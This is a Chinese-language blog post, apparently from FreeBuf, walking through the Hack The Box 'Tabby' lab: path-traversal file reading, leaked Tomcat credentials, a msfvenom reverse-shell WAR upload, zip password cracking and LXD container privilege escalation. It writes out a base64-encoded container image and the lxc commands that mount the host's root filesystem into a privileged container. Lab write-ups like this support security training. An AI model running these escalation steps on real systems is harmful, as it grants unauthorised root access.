freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

hack the box 之tabby靶场练习
2023-05-27 14:04:46
所属地 河南省

练习笔记

连接vpn获取ip:
image.png
扫端口:
image.png
发现开放了22,80,8080。
先从80和8080开始。
80:
image.png
8080:
image.png
发现80端口是一个网站主页。扫一下目录:
image.png

看一下readme.txt:
image.png
没啥意思。
login?:
image.png
也没啥东西。
news.php?:
image.png
空白页。
看看功能:
news选项出现了异常:
image.png
好像是域名解析出现了问题,改一下hosts文件。
image.png
刷新页面:
image.png
页面很正常,但是参数不大对劲,可能存在漏洞。尝试改一下参数:
image.png
确实读取了目标机器中的/etc/paswd文件。
而8080端口提示了有 /etc/tomcat9/tomcat-users.xml.
这个文件。看一下:
image.png
没东西。
自己装一个tomcat9看看:
image.png
发现tomcat-users.xml对应的是两个目录。
试试用上面的漏洞读取另一个目录的文件:
image.png
发现了一组账号密码:
tomcat/$3cureP4s5w0rd123!
登陆tomcat管理页面:
image.png
显示无权限。
带着这组账户密码访问host-manager:
image.png
可以正常访问。
尝试穿一个war包试试。
根据官方文档:
image.png
可以通过这种方式部署war包。尝试一下:
先用msfvenom生成一个反弹shell的war包:
image.png
然后用上述方式将war包上传部署到目标服务器上:
image.png
开启监听,然后访问war包:
image.png
成功获得shell。
先尝试搞个tty:
image.png
成功。
看看权限:
image.png
果然是低权限。
看看用户信息:
image.png
发现有ash和root两个用户。
可能需要先提权到ash,再提权到root
看看有suid的程序或文件:
image.png
发现了这老些东西。暂时先记下来。
sudo -l看看:
image.png
用不成。
翻翻文件看看:
image.png
好像看到了一个backup文件,可能是备份,先下载下来看看再说:
image.png
image.png
解压看看:
image.png
居然要密码,爆破一下看看:
image.png
搞出来了一个密码:admin@it。
解压后就这些东西:
image.png
不值得看。
试试用这个密码切换到ash:
image.png
成了。
接下来就是进一步提权到root了。
但是在一番探索后,并没有发现任何可以提权到root的办法,不得已只好求助于百度,而他给我的答案是lxd提权。

LXD 是基于LXC容器的管理程序(hypervisor),它由开发 Ubuntu 的公司 Canonical 创建和维护。它由3个组建构成:
lxd :系统守护进程,它导出能被本地和网络访问的 RESTful API
lxc :客户端命令行,它能跨网络管理多个容器主机。
nova-compute-lxd : OpenStack Nova 插件,它使 OpenStack 如虚拟机一般,管理容器。

在一番了解后,我也开始了上手尝试:
首先给github中现有的提权包下载下来:
image.pngimage.pngimage.png
然后开启http服务:
image.png
在目标机器上下载这个.gz文件:
image.png
改个名,给他移到tmp去。
image.png
然后开始提权:
image.png
好嘛,一开始就寄了。
按他提示做,将lxc换成/snap/bin/lxc:
image.png
又寄了,他说我-c参数不对,没这个参数。奇了怪了。只好再去求助百度。结果解决方法没找到,倒是看到了另外一种提权方法:

ash@tabby:/var/lib/tomcat9$ cd /dev/shm
ash@tabby:/dev/shm$ echo QlpoOTFBWSZTWaxzK54ABPR/p86QAEBoA//QAA3voP/v3+AACAAEgACQAIAIQAK8KAKCGURPUPJGRp6gNAAAAGgeoA5gE0wCZDAAEwTAAADmATTAJkMAATBMAAAEiIIEp5CepmQmSNNqeoafqZTxQ00HtU9EC9/dr7/586W+tl+zW5or5/vSkzToXUxptsDiZIE17U20gexCSAp1Z9b9+MnY7TS1KUmZjspN0MQ23dsPcIFWwEtQMbTa3JGLHE0olggWQgXSgTSQoSEHl4PZ7N0+FtnTigWSAWkA+WPkw40ggZVvYfaxI3IgBhip9pfFZV5Lm4lCBExydrO+DGwFGsZbYRdsmZxwDUTdlla0y27s5Euzp+Ec4hAt+2AQL58OHZEcPFHieKvHnfyU/EEC07m9ka56FyQh/LsrzVNsIkYLvayQzNAnigX0venhCMc9XRpFEVYJ0wRpKrjabiC9ZAiXaHObAY6oBiFdpBlggUJVMLNKLRQpDoGDIwfle01yQqWxwrKE5aMWOglhlUQQUit6VogV2cD01i0xysiYbzerOUWyrpCAvE41pCFYVoRPj/B28wSZUy/TaUHYx9GkfEYg9mcAilQ+nPCBfgZ5fl3GuPmfUOB3sbFm6/bRA0nXChku7aaN+AueYzqhKOKiBPjLlAAvxBAjAmSJWD5AqhLv/fWja66s7omu/ZTHcC24QJ83NrM67KACLACNUcnJjTTHCCDUIUJtOtN+7rQL+kCm4+U9Wj19YXFhxaXVt6Ph1ALRKOV9Xb7Sm68oF7nhyvegWjELKFH3XiWstVNGgTQTWoCjDnpXh9+/JXxIg4i8mvNobXGIXbmrGeOvXE8pou6wdqSD/F3JFOFCQrHMrng= | base64 -d > bob.tar.bz2
依次输入。 中途的询问全部按回车。
lxd init
lxc image import bob.tar.bz2 --alias bobImage
lxc init bobImage bobVM -c security.privileged=true
lxc config device add bobVM realRoot disk source=/ path=r
lxc start bobVM
lxc exec bobVM -- /bin/sh

尝试一下:

image.png
image.png
果真提权成功。查找flag:
image.png
image.png

# 渗透测试 # web安全 # 内网渗透 # 网络安全技术 # HackTheBox
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者